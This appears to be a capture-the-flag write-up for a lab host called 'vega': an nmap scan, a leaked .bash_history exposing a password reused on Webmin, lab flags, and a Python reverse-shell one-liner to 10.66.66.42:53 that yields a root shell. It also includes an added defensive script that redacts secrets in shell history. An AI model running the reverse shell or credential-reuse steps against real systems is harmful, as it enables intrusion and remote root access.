ptd-vega

As always, we start with an nmap scan:

E:\PENTEST\NMAP>nmap -A 10.150.150.222
Starting Nmap 7.70 ( https://nmap.org ) at 2021-02-08 08:56 W. Europe Standard Time
Nmap scan report for vega (10.150.150.222)
Host is up (0.031s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 af:56:59:c5:9a:de:f4:a9:b7:8f:34:4b:a2:21:24:71 (RSA)
| 256 1b:e8:16:d4:dc:a6:7a:3e:5d:6f:f2:95:5a:59:08:9a (ECDSA)
|_ 256 9c:35:dd:da:ee:a9:b4:0b:55:68:45:fd:8f:85:35:30 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://10.150.150.222/?SID=u4lc77vbafcrv7vrskh0c4ciqa
8089/tcp open ssl/http Splunkd httpd
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-10-25T09:19:54
|_Not valid after: 2022-10-24T09:19:54
10000/tcp open http MiniServ 1.941 (Webmin httpd)
|_http-server-header: MiniServ/1.941
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4.26
OS details: Linux 2.4.26 (Slackware 10.0.0)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 ...
2 31.00 ms vega (10.150.150.222)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.51 seconds

E:\PENTEST\NMAP>

C:\Users\puckiestyle>curl http://10.150.150.222/.bash_history
history
sudo apt-get update && apt-get upgrade -y
sudo apt install apache2
sudo systemctl enable apache2
sudo apt install mariadb-server
sudo a2enmod rewrite
sudo nano /etc/apache2/sites-available/magento2.example.com.conf
sudo a2dissite 000-default.conf
flag40=3e11129fe2d30563999cd1d5602a1f7eb90e2176
sudo systemctl reload apache2
sudo a2ensite magento2.example.com.conf
sudo systemctl reload apache2
cd /tmp/
cd logstalgia-1.0.3/
./configure
sudo passwd root
apt-get install libsdl1.2-dev libsdl-image1.2-dev libpcre3-dev libftgl-dev libpng12-dev libjpeg62-dev make gcc
./configure
make
apt-get install libsdl1.2-dev libsdl-image1.2-dev libpcre3-dev libftgl-dev libpng12-dev libjpeg62-dev make gcc++
apt-get install libsdl1.2-dev libsdl-image1.2-dev libpcre3-dev libftgl-dev libpng12-dev libjpeg62-dev make gcc
apt-get install make
mysql -u root -p
apt-get install grsync
apt-get install unison
unisonsudo systemctl restart apache2
ping 1.1.1.1
ping 8.8.8.8
sudo apt install software-properties-common
sudo apt-key adv --recv-keys --keyserver hkp://keyserver.ubuntu.com:80 0xF1656F24C74CD1D8
sudo add-apt-repository 'deb http://mirrors.coreix.net/mariadb/repo/10.2/ubuntu xenial main'
sudo apt update
echo FLAG40=3e11129fe2d30563999cd1d5602a1f7eb90e2176
sudo apt install mariadb-server -y
netstat -np | grep 22
mysql -u root -p
mysql -u magento -p
sudo apt install php7.0 php7.0-curl php7.0-mysql libapache2-mod-php7.0
sudo nano /etc/php/7.2/cli/php.ini
ipconfig
ifconfig
sudo nano /etc/php/7.2/apache2/php.ini
sudo nano /etc/apache2/sites-available/magento2.example.com.conf
sudo crontab -u vega -e
sudo systemctl restart apache2
sudo cat /var/log/apache2/error.log
sudo chown -R www-data:www-data .
sudo nano /etc/apache2/sites-available/magento2.example.com.conf
sudo /etc/init.d/apache2 restart
sudo nano /etc/apt/sources.list
cd /tmp/
wget http://www.webmin.com/jcameron-key.asc
sudo systemctl reload apache2
cd /tmp/
cd logstalgia-1.0.3/
./configure
cd /home/vega
ls -lah
ifconfig
sudo passwd rootsudo apt-key add jcameron-key.asc
sudo apt update
sudo apt install webmin
cd ..
history
mysqldump -u vega --password=puplfiction1994 magento2 > dumpmagento.sql
cd /home/vega
ls -lah
ll
sudo su
cd /root/
nano CAM.shortcut

C:\Users\puckiestyle>

We can use vega / pulpfiction1994 to log on to Webmin at https://vega:10000
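The history dump above leaks a database password on the mysqldump line and a flag on an echo line, while the plain `mysql -u root -p` lines leak nothing because the password was typed at a prompt. The Python example below is added here and is not from the original post: it scans history text for credentials passed inline and reports each hit with the secret redacted, which is how a defender would triage a history file found in a web root and decide which credentials to rotate. The sample lines are constructed and modelled on the dump above; the `-pS3cretValue` line is invented to show the glued short-option form.

```python
import re

# Constructed sample modelled on the history dump above; the -pS3cretValue line is invented.
SAMPLE_HISTORY = """\
sudo apt install mariadb-server
mysql -u root -p
echo FLAG40=3e11129fe2d30563999cd1d5602a1f7eb90e2176
mysqldump -u vega --password=puplfiction1994 magento2 > dumpmagento.sql
mysql -u magento -pS3cretValue
sudo crontab -u vega -e
"""

# Ways a secret ends up written into shell history; group 1 is the part to keep, the rest is hidden:
#   long option   --password=VALUE (mysql/mysqldump, also --passwd= / --pass=)
#   short option  -pVALUE with the value glued on; a bare "-p" only opens a prompt and leaks nothing
#   assignment    FLAG40=VALUE, PASSWORD=VALUE, TOKEN=VALUE and similar
INLINE_SECRET_PATTERNS = [
    ("long-option", re.compile(r"(--(?:password|passwd|pass)=)\S+")),
    ("short-option", re.compile(r"(?<=\s)(-p)[^\s-]\S*")),
    ("assignment", re.compile(r"\b((?:flag\d*|passw(?:or)?d|secret|token|api[_-]?key)=)\S+", re.I)),
]


def redact(line):
    """Return the line with every inline secret value replaced by <redacted>."""
    for _, pattern in INLINE_SECRET_PATTERNS:
        line = pattern.sub(r"\1<redacted>", line)
    return line


def find_inline_secrets(history_text):
    """Return (line_no, kind, redacted_line) for each history line carrying a secret inline.

    Interactive prompts such as ``mysql -u root -p`` are not reported: the password
    was typed at the prompt and never reached the history file.
    """
    findings = []
    for line_no, line in enumerate(history_text.splitlines(), start=1):
        for kind, pattern in INLINE_SECRET_PATTERNS:
            if pattern.search(line):
                findings.append((line_no, kind, redact(line.strip())))
                break  # one report per line; redact() still cleans every pattern
    return findings


if __name__ == "__main__":
    for line_no, kind, redacted in find_inline_secrets(SAMPLE_HISTORY):
        print(f"line {line_no:>3} [{kind}] {redacted}")
```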

> ls
CAM.shortcut
FLAG42.txt
> cat FLAG42.txt
95beef4e71ae3a503282ac54acb6d9cdc547f8c8
> whoami
root
> hostname
vega
> cat CAM.shortcut
URL: http://10.150.150.250

Notes: Do not forget the cam is only reachable from this jumpstation and another one. [ stuntman mike ]

To get a reverse shell (the listener is on 10.66.66.42, port 53), run:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.66.66.42",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

E:\PENTEST>nc -nlvp 53
listening on [any] 53 ...
connect to [10.66.66.42] from (UNKNOWN) [10.150.150.222] 46718
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
vega
#

Author : Puckiestyle
